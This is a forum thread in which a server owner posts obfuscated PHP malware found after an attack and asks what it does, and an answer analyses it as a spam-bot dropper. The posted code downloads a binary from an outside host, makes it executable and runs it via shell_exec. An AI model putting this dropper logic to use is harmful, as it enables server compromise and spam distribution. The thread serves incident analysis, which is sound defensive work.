# Is there anyway to easily decipher this virus code?

Tags: virus

My server was attacked (I cleared the infection - as far as I know) and I want to know what, if anything, might have been compromised (like my user data, for example).

I posted my last question on Stack Overflow. Well, I noticed that several virus servers were still attempting to contact my machine and giving me malicious code.

I translated this from base64, but it's still mostly gibberish. I've determined that it's trying to go to a page called **WARNING MALICIOUS LINK:** (edited)

Here's the code - I have substantially cleaned it up:

```
    $w50="0o,]a*Lt7/D%[>|WAvITmqpwH~.B5kN1O\r`<( M\tV?^_3F\neb\$6'+iUXS\\9xZ4hzr};P{gs=&yJQ)dj-fE\"2!Rlc@C#nGY:Ku8"; $GLOBALS['fwjlt66'] = $w50[22].$w50[62].$w50[22].$w50[43].$w50[96].$w50[91].$w50[4].$w50[20].$w50[47]; $GLOBALS['qjgox86'] = $w50[80].$w50[96].$w50[91].$w50[87].$w50[7].$w50[53].$w50[1].$w50[91].$w50[43].$w50[47].$w50[59].$w50[53].$w50[70].$w50[7].$w50[70]; $GLOBALS['agnsv93'] = $w50[70].$w50[7].$w50[64].$w50[86].$w50[47].$w50[91]; $GLOBALS['cqvwl52'] = $w50[77].$w50[47].$w50[87].$w50[48].$w50[53].$w50[91]; $GLOBALS['ecgfc33'] = $w50[80].$w50[53].$w50[86].$w50[47].$w50[43].$w50[47].$w50[59].$w50[53].$w50[70].$w50[7].$w50[70]; $GLOBALS['licvl99'] = $w50[59].$w50[62].$w50[29].$w50[73].$w50[69].$w50[58].$w50[50]; $GLOBALS['bokew22'] = $w50[87].$w50[62].$w50[20].$w50[1].$w50[77]; $GLOBALS['wtaky62'] = $w50[70].$w50[62].$w50[47].$w50[86].$w50[86].$w50[43].$w50[47].$w50[59].$w50[47].$w50[87]; $GLOBALS['neabn53'] = $w50[70].$w50[86].$w50[47].$w50[47].$w50[22]; $GLOBALS['cfffy63'] = $w50[96].$w50[91].$w50[86].$w50[53].$w50[91].$w50[29]; $GLOBALS['quyxh40'] = $w50[1].$w50[73].$w50[1].$w50[86].$w50[53].$w50[44].$w50[50]; $GLOBALS['ebiwk51'] = $w50[80].$w50[1].$w50[22].$w50[47].$w50[91]; $GLOBALS['exwal59'] = $w50[87].$w50[96].$w50[64].$w50[86].$w50[43].$w50[53].$w50[91].$w50[53].$w50[7]; $GLOBALS['wyvgi49'] = $w50[87].$w50[96].$w50[64].$w50[86].$w50[43].$w50[70].$w50[47].$w50[7].$w50[1].$w50[22].$w50[7]; $GLOBALS['ayrhy29'] = $w50[87].$w50[96].$w50[64].$w50[86].$w50[43].$w50[47].$w50[59].$w50[47].$w50[87]; $GLOBALS['wkobm38'] = $w50[87].$w50[96].$w50[64].$w50[86].$w50[43].$w50[87].$w50[86].$w50[1].$w50[70].$w50[47]; $GLOBALS['jxivj52'] = $w50[80].$w50[47].$w50[1].$w50[80]; $GLOBALS['wnmlt16'] = $w50[80].$w50[64].$w50[47].$w50[4].$w50[77]; $GLOBALS['yaqtf48'] = $w50[80].$w50[87].$w50[86].$w50[1].$w50[70].$w50[47]; $GLOBALS['nqtio88'] = $w50[87].$w50[59].$w50[7].$w50[77].$w50[22].$w50[44].$w50[61]; $GLOBALS['rxtpe19'] = $w50[80].$w50[53].$w50[86].$w50[47].$w50[43].$w50[22].$w50[96].$w50[7].$w50[43].$w50[87].$w50[1].$w50[91].$w50[7].$w50[47].$w50[91].$w50[7].$w50[70]; $GLOBALS['mrwmq50'] = $w50[80].$w50[23].$w50[64].$w50[53].$w50[7].$w50[47]; $ktjhg56 =$w50[62].$w50[7].$w50[7].$w50[22].$w50[94].$w50[9].$w50[9].$w50[22].$w50[4].$w50[69].$w50[47].$w50[70].$w50[26].$w50[7].$w50[1].$w50[96].$w50[87].$w50[62].$w50[22].$w50[4].$w50[77].$w50[63].$w50[26].$w50[87].$w50[1].$w50[20].$w50[9].$w50[87].$w50[64].$w50[1].$w50[91].$w50[77].$w50[44].$w50[83];
$kilow69 = "http://pages.touchpadz.com/crond64";
$xsqmk27 = "XDVSN_SESSION_COOKIE=PnJxPDMyPi1ycTw+d3BqPD4td3BqPD53cHI8Pi13cHI8Pm52PDcyMj4tbnY8Pm5hPDMyMj4tbmE8PmBxPDAyPi1gcTw+bnc8anZ2cjgtLXFpLHZtd2FqcmNmeCxhbW8tPi1udzw+YHc8anZ2cjgtLWBjdix2bXdhanJjZngsYW1vLWNjMCxyanI+LWB3PD5xdzxqdnZyOC0tcXZjdix2bXdhanJjZngsYW1vLWVoMzEscmpyPi1xdzw+bmZgPHVgXTIyMz4tbmZgPD5paTw0YDUwMDZhNDMwYWQyY2AuNmY0YWZnMmMwNDQ3YWBnMC40NzBhYDVhNzdjZjc3YTJmLjRmOmdhO2A1MTs3Zjo1MTouMGA3OmFhO2M3MGcyZ2M3NS4wYTE7NDNnOzRgNmA0MjcxLjAzYzM0M2YxNGMzZmA0OmMuNjZgYDs0Mzs1NTVgYzoxNy43NTQyY2c6MzJhNDMyNztnLjE3YDozMjMzNjUwNTA7NmMuN2EyOjNkNGMzOzY0ZjsyMi41YzcyZmY7YTcxMjdjZjA0LjM7Y2AyNDI3MGAzOjozMzEuNzdhMDdnMDc2YGAxMWFhNy40NjdgMzNkYTM0ZGMwYToxLjA6Mjs7ZzY2OmQ1OmNjYy41MWAzMjdkOjRjZGQ3O2E2LjAwN2dhYDQxNWY1YDAxZmAuM2Q0ZDoyZmQ3MzU0MjAxZy4zYzpmO2RnMjY1ZGA1YzQ2LjZkMDJjM2FmNDU3ZDIxZDQuZ2RmOjAwNzA3NGA7NjU7LjE7ZzJnOmE0N2FmMDVnNWQuNWQ0ZDE3M2M3ZzI1YTJkOi42ZDJnNmBjOjExOjs0YWFjLjE2NztmZmA2ZDVnZjoxMi4zMmMxYzNgYTQ0YWQ6NWYwLjYwZmc0MDdkMzQyYWNnZ2AuM2NgMjMxNjAzZmEyYzM0Ni43M2MxZGYwNjQ3NjJgMDIzLjVjNDRmNzFgNTcxOzs2Z2MuMzU0MjJhNGEwMGFkZjYzNS41YzRmOjc6MzBhNzo3Ojs6LjdhMDJgYDphNDpkOzc3MWMuNjs2Y2FjNzE2ZjA7NTQ0MC43ZjNgOjcwNTE7YTExNmY6LjFnYTBgMjBnN2RgYWRmZjouNTJgZmcwYzo2MDRgZGQzMy42MjE1MzphZzQzMWZmZ2Q1LjA2ZDs7ZmM1NWRmZjsxOmYuMGEyMDszMTQ3YTpgYTo1MC43ZjM3MDc1YDM1NzIzZGMzLmY2YWYyYzAwZzM3OjYwNC40OzUxNjMxMTJmYTMyNGEuMWRgYzVmMDs0YTRkNTMzNi46NDs3MzcyMWM3O2MzMDQuNzA0MTA3N2Y0YDBjNDo7MC4wZjE1YTNmYDA1Ozo0O2A2LjU2MWRnNDMyMmQzZjVjNS43Ojc3NTMxNTczNWc2ZmQuNTFgMTRjMGYyOjIyMGY3Oy42MWMzNTFhZDNhYGM1ZDdkLjM6MjI6NDdgNmM1NzJnNzAuNmNkZDszNzY3MjtnOjtnOy43OjUyOmNkZzY2YDc7OmA2LjRnMWFgNDZkNzFnNzU0YDsuNWZmN2Y6N2E0MDUyMjAxNi4wNWMzMzoyZDYzMTBmNGEwLjUyYDNgZmM2MDczO2Y3NGQuNjEyYGBkMzQxOjBnYzM0MS41ZjQ3YTsyYDA3NTA1MTA2LjVhZzc7Nzc0NjZjZGEwYWQuNGQzZDI6Zzs3ZzowNTFjMS42NDU0NjY1NjVnOjo6MzU3LjExZ2BjY2ZkMTczZDUwYTI+LWlpPA==";
$GLOBALS = array([dusbyosox] => fl [pvdmmvljuf] => incfl [ujhcrcgt] => id [smhtcwn] => qstr [jumxqwr] => ids [hnbbbkqfrkpt] => scode [culgtk] => url [krkdpxshxvn] => ch [hjmyjb] => errno [cupqhvfqdl] => msg [wlhdpqq] => errstr [loxnlmgvdc] => err [w50] => 0o,]a*Lt7/D%[>|WAvITmqpwH~.B5kN1O `<( M V?^_3F eb$6'+iUXS\9xZ4hzr};P{gs=&yJQ)dj-fE"2!Rlc@C#nGY:Ku8 [fwjlt66] => php_uname [qjgox86] => function_exists [agnsv93] => strlen [cqvwl52] => decbin [ecgfc33] => file_exists [licvl99] => xhkyg96 [bokew22] => chmod [wtaky62] => shell_exec [neabn53] => sleep [cfffy63] => unlink [quyxh40] => oyoli36 [ebiwk51] => fopen [exwal59] => curl_init [wyvgi49] => curl_setopt [ayrhy29] => curl_exec [wkobm38] => curl_close [jxivj52] => feof [wnmlt16] => fread [yaqtf48] => fclose [nqtio88] => cxtdp34 [rxtpe19] => file_put_contents [mrwmq50] => fwrite [ktjhg56] => http://pages.touchpadz.com/crond32 [kilow69] => http://pages.touchpadz.com/crond64 [xsqmk27] => XDVSN_SESSION_COOKIE=PnJxPDMyPi1ycTw+d3BqPD4td3BqPD53cHI8Pi13cHI8Pm52PDcyMj4tbnY8Pm5hPDMyMj4tbmE8PmBxPDAyPi1gcTw+bnc8anZ2cjgtLXFpLHZtd2FqcmNmeCxhbW8tPi1udzw+YHc8anZ2cjgtLWBjdix2bXdhanJjZngsYW1vLWNjMCxyanI+LWB3PD5xdzxqdnZyOC0tcXZjdix2bXdhanJjZngsYW1vLWVoMzEscmpyPi1xdzw+bmZgPHVgXTIyMz4tbmZgPD5paTw0YDUwMDZhNDMwYWQyY2AuNmY0YWZnMmMwNDQ3YWBnMC40NzBhYDVhNzdjZjc3YTJmLjRmOmdhO2A1MTs3Zjo1MTouMGA3OmFhO2M3MGcyZ2M3NS4wYTE7NDNnOzRgNmA0MjcxLjAzYzM0M2YxNGMzZmA0OmMuNjZgYDs0Mzs1NTVgYzoxNy43NTQyY2c6MzJhNDMyNztnLjE3YDozMjMzNjUwNTA7NmMuN2EyOjNkNGMzOzY0ZjsyMi41YzcyZmY7YTcxMjdjZjA0LjM7Y2AyNDI3MGAzOjozMzEuNzdhMDdnMDc2YGAxMWFhNy40NjdgMzNkYTM0ZGMwYToxLjA6Mjs7ZzY2OmQ1OmNjYy41MWAzMjdkOjRjZGQ3O2E2LjAwN2dhYDQxNWY1YDAxZmAuM2Q0ZDoyZmQ3MzU0MjAxZy4zYzpmO2RnMjY1ZGA1YzQ2LjZkMDJjM2FmNDU3ZDIxZDQuZ2RmOjAwNzA3NGA7NjU7LjE7ZzJnOmE0N2FmMDVnNWQuNWQ0ZDE3M2M3ZzI1YTJkOi42ZDJnNmBjOjExOjs0YWFjLjE2NztmZmA2ZDVnZjoxMi4zMmMxYzNgYTQ0YWQ6NWYwLjYwZmc0MDdkMzQyYWNnZ2AuM2NgMjMxNjAzZmEyYzM0Ni43M2MxZGYwNjQ3NjJgMDIzLjVjNDRmNzFgNTcxOzs2Z2MuMzU0MjJhNGEwMGFkZjYzNS41YzRmOjc6MzBhNzo3Ojs6LjdhMDJgYDphNDpkOzc3MWMuNjs2Y2FjNzE2ZjA7NTQ0MC43ZjNgOjcwNTE7YTExNmY6LjFnYTBgMjBnN2RgYWRmZjouNTJgZmcwYzo2MDRgZGQzMy42MjE1MzphZzQzMWZmZ2Q1LjA2ZDs7ZmM1NWRmZjsxOmYuMGEyMDszMTQ3YTpgYTo1MC43ZjM3MDc1YDM1NzIzZGMzLmY2YWYyYzAwZzM3OjYwNC40OzUxNjMxMTJmYTMyNGEuMWRgYzVmMDs0YTRkNTMzNi46NDs3MzcyMWM3O2MzMDQuNzA0MTA3N2Y0YDBjNDo7MC4wZjE1YTNmYDA1Ozo0O2A2LjU2MWRnNDMyMmQzZjVjNS43Ojc3NTMxNTczNWc2ZmQuNTFgMTRjMGYyOjIyMGY3Oy42MWMzNTFhZDNhYGM1ZDdkLjM6MjI6NDdgNmM1NzJnNzAuNmNkZDszNzY3MjtnOjtnOy43OjUyOmNkZzY2YDc7OmA2LjRnMWFgNDZkNzFnNzU0YDsuNWZmN2Y6N2E0MDUyMjAxNi4wNWMzMzoyZDYzMTBmNGEwLjUyYDNgZmM2MDczO2Y3NGQuNjEyYGBkMzQxOjBnYzM0MS41ZjQ3YTsyYDA3NTA1MTA2LjVhZzc7Nzc0NjZjZGEwYWQuNGQzZDI6Zzs3ZzowNTFjMS42NDU0NjY1NjVnOjo6MzU3LjExZ2BjY2ZkMTczZDUwYTI+LWlpPA==)

// Gives host operating system name
$aljav65 = php_uname(s);

// Gives machine type
$lyvqp40 = php_uname(m);

echo '<shchzzz>';

for (;;) {
if(!function_exists(shell_exec) {
echo '<err step=1 err=noshex data=>'
break;
}
if($aljav65 !== "Linux") {
echo '<err step=2 err=nolinux data=>';
break;
}

$eeirq58 = 'crond';
$csjxi53 = "";

// decimal to binary - probably a way to figure out the type of system it is
if(strlen(decbin(~0)) == 64) {
echo '<inf step=3 data=x64>';
$csjxi53 = $kilow69;
}
else {
echo '<inf step=3 data=x64>';
$csjxi53 = $ktjhg56;
}

$jzugq1 = "";
if(!file_exists('crond')) {
$jzugq1 = xhkyg96($w50, 'http://pages.touchpadz.com/crond64crond', crond);

if ( $jzugq1 == FALSE) {
echo '<err step=4 err=downl data=>';
break;
} else {
echo '<inf step=4 data=downok>';
}
} else {
echo '<inf step=4 data=exists>';
}

chmod($jzugq1, 755);
    $caaku38 = $xsqmk27.$w50[37].$w50[26].$w50[9].$jzugq1.$w50[37].$w50[13].$w50[9].$w50[77].$w50[47].$w50[17].$w50[9].$w50[91].$w50[96].$w50[86].$w50[86].$w50[37].$w50[83].$w50[13].$w50[9].$w50[77].$w50[47].$w50[17].$w50[9].$w50[91].$w50[96].$w50[86].$w50[86].$w50[37].$w50[72];
    $vepmo93 = shell_exec($caaku38);
    echo $w50[35].$w50[53].$w50[91].$w50[80].$w50[37].$w50[70].$w50[7].$w50[47].$w50[22].$w50[71].$w50[28].$w50[37].$w50[77].$w50[4].$w50[7].$w50[4].$w50[71].$w50[77].$w50[1].$w50[91].$w50[47].$w50[37].$w50[77].$w50[4].$w50[7].$w50[4].$w50[83].$w50[71].$vepmo93.$w50[13];
    sleep(1);
    unlink($jzugq1);
    break;
}

echo '</shchzzz>';
exit();

function oyoli36($w50, $iyjzg82) {
    $kxsnc64 = "";
    $gnmie55 = @fopen($iyjzg82, 'rb');
    if ($gnmie55 == FALSE) {
        if (!function_exists('curl_init')) return FALSE;
        $iahsh76 = @curl_init();
        @curl_setopt($iahsh76, CURLOPT_URL, $iyjzg82);
        @curl_setopt($iahsh76, CURLOPT_RETURNTRANSFER, true);
        $kxsnc64 = @curl_exec($iahsh76);
        @curl_close($iahsh76);
    } else {
        while(!feof($gnmie55)) $kxsnc64.=fread($gnmie55, 1024 * 64 );
        fclose($gnmie55);
    }
    return $kxsnc64;
}

function cxtdp34($w50, $ekfco84, $kxsnc64) {
    $dlyti36 = fopen($ekfco84, wb+);
    if ($dlyti36 == FALSE) {
        if (!function_exists(file_put_contents) return FALSE;
        if ( @file_put_contents($ekfco84, $kxsnc64) === FALSE ) return FALSE;
    } else {
        $gibnq51 = fwrite($dlyti36, $kxsnc64, strlen($kxsnc64));
        fclose($dlyti36);
        if ($gibnq51 == FALSE || $gibnq51 != strlen($kxsnc64)) return FALSE;
    }
    return TRUE;
}

function xhkyg96($w50, $iyjzg82, $vmtdr19) {
    $kxsnc64 = oyoli36($w50, $iyjzg82);
    if ($kxsnc64 == FALSE) return FALSE;
    if (cxtdp34($w50, $w50[26].$w50[9].$vmtdr19, $kxsnc64) == FALSE) {
        if (cxtdp34($w50, '/tmp/'.$vmtdr19, $kxsnc64) == FALSE) {
            return FALSE;
        } else {
            return '/tmp'.$vmtdr19;
        }
    } else {
        return "./".$vmtdr19;
    }
    return FALSE;
}
```

I was hoping that someone would know of some service that interprets or can tell me what may have happened. I can try to reconstruct it myself, but if anyone has any information that would be very helpful to me.

Comment: Yes, it's getting the 36th item in the $w50 string.

Comment: ok, then what about the code do you need deciphered?

Comment: This code has so many syntax errors, it just won't do anything. Could you post the original source?

Answer (score 1):

I disassembled the 64 bit binary and looked through the code and it appears to only download and email spam messages - it doesn't appear to attempt to compromise the system.

The PHP code downloads and launches the 32bit or 64bit version of the spammer program depending on the system to `/tmp/crond`. The program will then download via HTTP the following items from their C&C server:

1. An email message to send
2. A list of email addresses
3. Multiple URLs containing their PHP mailer script used to send the email messages

The C&C servers are set by the `XDVSN_SESSION_COOKIE` environment variable which is encoded with base64 and XOR'ed with 1's. Launching their binary without the environment variable set will cause the program to immediately terminate.

It appears that this exploit will fail if `/tmp` is mounted with `noexec`, though this can be easily changed by the attacker.